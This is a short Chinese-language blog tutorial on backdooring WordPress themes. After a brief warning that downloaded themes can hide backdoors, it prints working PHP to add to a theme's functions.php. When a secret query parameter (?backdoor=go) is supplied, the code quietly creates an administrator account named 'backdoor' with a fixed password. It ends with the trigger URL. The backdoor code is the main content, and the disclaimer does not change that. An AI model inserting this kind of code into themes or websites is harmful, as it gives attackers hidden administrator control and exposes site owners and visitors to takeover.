我们都听说过网站后门这个东西,就拿wordpress来说,主程序可以在官网下载到,而一些网上找的主题,有可能会被人加上后门,然后打包成主题文件,你下载安装以后,你的网站就会存在被人事先设置好的后门(backdoor),我们我就来演示一下,给wordpress加上一个简单的后门,直接获取管理员权限,这篇文章仅供参考,我建议你在帮别人用wordpress做网站的时候,一定不要这样做~做一个三好青年。
帮下面这段代码放进wordpress主题文件的functions.php文件里
<?php add_action( 'wp_head', 'my_backdoor' ); function my_backdoor() { if ( md5( $_GET['backdoor'] ) == '34d1f91fb2e514b8576fab1a75a89a6b' ) { require( 'wp-includes/registration.php' ); if ( !username_exists( 'backdoor' ) ) { $user_id = wp_create_user( 'backdoor', 'pa55w0rd!' ); $user = new WP_User( $user_id ); $user->set_role( 'administrator' ); } } }
这样,后门就创建好啦,现在只要通过域名访问https://www.yoursite.com/?backdoor=go,这个wordpress的网站就会创建一个用户名为"backdoor"的管理员,密码为"pa55w0rd!"